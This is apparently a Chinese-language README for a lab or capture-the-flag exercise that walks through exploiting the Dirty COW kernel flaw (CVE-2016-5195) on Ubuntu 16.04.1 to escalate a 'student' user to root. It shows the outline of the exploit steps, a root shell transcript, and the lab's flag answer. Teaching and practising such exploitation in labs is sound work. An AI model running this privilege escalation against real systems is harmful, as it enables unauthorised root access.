利用 Dirty COW (CVE-2016-5195) 漏洞,适用于 Ubuntu 16.04.1。
cat > README.md <<'EOF'
此实验展示了在运行Ubuntu Server 16.04.1且内核存在漏洞的系统上利用Dirty COW漏洞的过程。
目标是从受限用户(student)提权至 root,并获取位于 /root/flag.txt 的 flag。
Linux 4.4.0-31-generic(存在漏洞)。ubuntu:16.04 中编译 dirtycow_passwd.c → 生成二进制文件 dirty。scp dirty student@<IP>:~/。chmod +x ~/dirty && ~/dirty → su root(密码为 dirtyCowFun)。cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}。root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
获取到的 Flag